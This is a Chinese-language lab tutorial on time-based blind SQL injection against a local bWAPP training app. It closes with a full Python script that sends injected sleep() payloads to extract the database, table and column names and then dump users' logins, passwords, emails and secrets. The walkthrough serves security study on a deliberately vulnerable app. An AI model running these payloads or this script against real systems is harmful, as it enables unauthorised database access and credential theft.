使用docker启动环境、登录、并跳转到时间盲注的页面:
choosetarget.png
打开HackBar Quantum插件、开发者工具,使用简单的方式来进行测试,查看是否可以进行时间盲注:
test.png
从页面可以看到,搜索电影,应该是按照电影名进行搜索,应该是一个字符串而不是数字,因为知道电影列表中有World War Z相关的电影,把这个当作一个参数:
character.png
通过输入的字符串进行请求,可以看到请求的时间明显要比其他的要长,可以得出结论为存在漏洞,可以进行注入。
获取数据库名字
常用的函数:
substr(a,b,c):从b位置开始,截取字符串a的c长度
count():计算总数
ascii():返回字符的ASCII码
length():返回字符串的长度
left(a,b):从左往右截取字符串a的前b个字符
sleep(n):将程序挂起n秒
image.png
从返回的时间来看,length(database()) > 4 的结果为true,说明数据库名字的长度要大于4,手动测试几个数,就可以得到数据库的长度:
image.png
为了获取数据库名字的长度,可以使用脚本来解决,因为mysql数据库的长度限制为64,从1遍历到64个,代码如下:
def get_database_length():
num = 0
for i in range(1, 64):
url = "http://localhost:12345/sqli_15.php?title=World War Z' and length(database())=%d and sleep(3) -- " \
"&action=search" % i
start_time = time.time()
resp = session.get(url)
end_time = time.time()
ga = end_time - start_time
# 因为上面的SQL,and length(database())=%d and sleep(3),如果length(database())=%d 返回的结果为false,
# 整个SQL就会返回false,就可以瞬间返回,如果length(database())=%d 返回的结果为True,sleep(3)就会执行,
# 整个sql执行的时间就会大于1s,在找到数据库的长度之后,就直接跳出循环。
if ga > 1:
print("length of database name is %d" % i)
num = i
break
return num
在获取数据库长度之后,要找出数据库的名字,因为数据库名字的规范:采用26个英文字母(区分大小写)和0-9的自然数(一般经常不需要加)加上下划线组成,命名简洁明确,多个单词用下划线分隔,一个项目一个数据库,为了方便比较,将字符变成数字,脚本如下:
def get_database_name(num):
# 因为返回的数据为字节,要把自己拼到一块
data = list()
for i in range(1, num + 1):
for j in range(33, 128):
url = "http://localhost:12345/sqli_15.php?title=World War Z' and ascii(substr(database(),%d,1))=%d and " \
"sleep(3) -- &action=search" % (i, j)
start_time = time.time()
rsp = session.get(url)
end_time = time.time()
ga = end_time - start_time
if ga > 1:
data.append(chr(j))
break
return "".join(data)
返回的数据为:bWAPP。
通过获取到的数据库,然后查找数据库中的数据表,数据表的的字段已经数据,代码是基于python3,代码如下:
# coding=utf-8
# !/usr/bin/python
# 基于时间的SQL盲注
import requests
import time
# ip地址需要根据实际情况进行修改
data = {
"login": "bee",
"password": "bug",
"security_level": "0",
"form": "submit"
}
ip_address = "http://localhost:12345/login.php"
# 获取全局session
session = requests.session()
resp = session.post(ip_address, data)
# 获取数据库名字的长度
def get_database_length():
num = 0
for i in range(1, 64):
url = "http://localhost:12345/sqli_15.php?title=World War Z' and length(database())=%d and sleep(3) -- " \
"&action=search" % i
start_time = time.time()
resp = session.get(url)
end_time = time.time()
ga = end_time - start_time
# 因为上面的SQL,and length(database())=%d and sleep(3),如果length(database())=%d 返回的结果为false,
# 整个SQL就会返回false,就可以瞬间返回,如果length(database())=%d 返回的结果为True,sleep(3)就会执行,
# 整个sql执行的时间就会大于1s,在找到数据库的长度之后,就直接跳出循环。
if ga > 1:
num = i
break
return num
# 获取数据库的名字
def get_database_name(num):
# 因为返回的数据为字节,要把自己拼到一块
database_char = list()
for i in range(1, num + 1):
for j in range(33, 128):
url = "http://localhost:12345/sqli_15.php?title=World War Z' and ascii(substr(database(),%d,1))=%d and " \
"sleep(3) -- &action=search" % (i, j)
start_time = time.time()
rsp = session.get(url)
end_time = time.time()
ga = end_time - start_time
if ga > 1:
database_char.append(chr(j))
break
database_name = "".join(database_char)
print("===database name===")
print(database_name)
get_table_name_num(database_name)
# 获取指定数据库下数据表的信息
# 1.获取数据表的名字长度
# 2.获取数据库表的名字
def get_table_name_num(database_name):
table_name_list = list()
for i in range(0, 6):
num = 0
for j in range(1, 64):
url = "http://localhost:12345/sqli_15.php?title=World War Z' and length((select table_name from " \
"information_schema.tables where table_schema='%s' limit %d,1))=%d and sleep(3) -- " \
"&action=search" % (database_name, i, j)
start_time = time.time()
resp = session.get(url)
end_time = time.time()
ga = end_time - start_time
# 因为上面的SQL,and length(database())=%d and sleep(3),如果length(database())=%d 返回的结果为false,
# 整个SQL就会返回false,就可以瞬间返回,如果length(database())=%d 返回的结果为True,sleep(3)就会执行,
# 整个sql执行的时间就会大于1s,在找到数据库的长度之后,就直接跳出循环。
if ga > 1:
num = j
break
table = get_table_name(i, num, database_name)
if len(table) > 0:
table_name_list.append(table)
print("===tables name===")
print(table_name_list)
for item in table_name_list:
get_table_column(item)
def get_table_name(k, num, database_name):
# 因为返回的数据为字节,要把自己拼到一块
data_char = list()
for i in range(1, num + 1):
for j in range(33, 128):
url = "http://localhost:12345/sqli_15.php?title=World War Z' and ascii(substr((select table_name from " \
"information_schema.tables where table_schema='%s' limit %d,1),%d,1))=%d and sleep(3) -- " \
"&action=search" % (database_name, k, i, j)
start_time = time.time()
rsp = session.get(url)
end_time = time.time()
ga = end_time - start_time
if ga > 1:
data_char.append(chr(j))
break
table_name = "".join(data_char)
return table_name
def get_table_column(table_name):
column_name_list = list()
for i in range(0, 20):
num = 0
for j in range(1, 64):
url = "http://localhost:12345/sqli_15.php?title=World War Z' and length((select column_name from " \
"information_schema.columns where table_name='%s' limit %d,1))=%d and sleep(3) -- " \
"&action=search" % (table_name, i, j)
start_time = time.time()
resp = session.get(url)
end_time = time.time()
ga = end_time - start_time
# 因为上面的SQL,and length(database())=%d and sleep(3),如果length(database())=%d 返回的结果为false,
# 整个SQL就会返回false,就可以瞬间返回,如果length(database())=%d 返回的结果为True,sleep(3)就会执行,
# 整个sql执行的时间就会大于1s,在找到数据库的长度之后,就直接跳出循环。
if ga > 1:
num = j
break
column = get_table_column_name(i, num, table_name)
if len(column) > 0:
column_name_list.append(column)
print("===%s columns ===" % table_name)
print(column_name_list)
def get_table_column_name(k, num, column_name):
# 因为返回的数据为字节,要把自己拼到一块
data_char = list()
for i in range(1, num + 1):
for j in range(33, 128):
url = "http://localhost:12345/sqli_15.php?title=World War Z' and ascii(substr((select column_name from " \
"information_schema.columns where table_name='%s' limit %d,1),%d,1))=%d and sleep(3) -- " \
"&action=search" % (column_name, k, i, j)
start_time = time.time()
rsp = session.get(url)
end_time = time.time()
ga = end_time - start_time
if ga > 1:
data_char.append(chr(j))
break
column_name = "".join(data_char)
return column_name
def get_column_length(table_name, item, index):
num = 0
for i in range(1, 64):
url = "http://localhost:12345/sqli_15.php?title=World War Z' and length((select %s from %s limit %d," \
"1))=%d and sleep(3) -- &action=search" % (item, table_name, index, i)
start_time = time.time()
resp = session.get(url)
end_time = time.time()
ga = end_time - start_time
if ga > 1:
num = i
break
data = get_column_data(table_name, item, index, num)
print(item)
print(data)
def get_column_data(table_name, item, index, num):
# 因为返回的数据为字节,要把自己拼到一块
data_char = list()
for i in range(1, num + 1):
for j in range(33, 128):
url = "http://localhost:12345/sqli_15.php?title=World War Z' and ascii(substr((select %s from %s limit " \
"%d,1),%d,1))=%d and sleep(3) -- &action=search" % (item, table_name, index, i, j)
start_time = time.time()
rsp = session.get(url)
end_time = time.time()
ga = end_time - start_time
if ga > 1:
data_char.append(chr(j))
break
data = "".join(data_char)
return data
if __name__ == '__main__':
# 获取数据库、数据表、数据表的字段
# get_database_name(get_database_length())
# 获取数据表的数据
table_name = 'users'
column_names = ['login', 'password', 'email', 'secret', 'activation_code', 'activated', 'reset_code', 'admin']
for index in range(1, 10):
for item in column_names:
get_column_length(table_name, item, index)
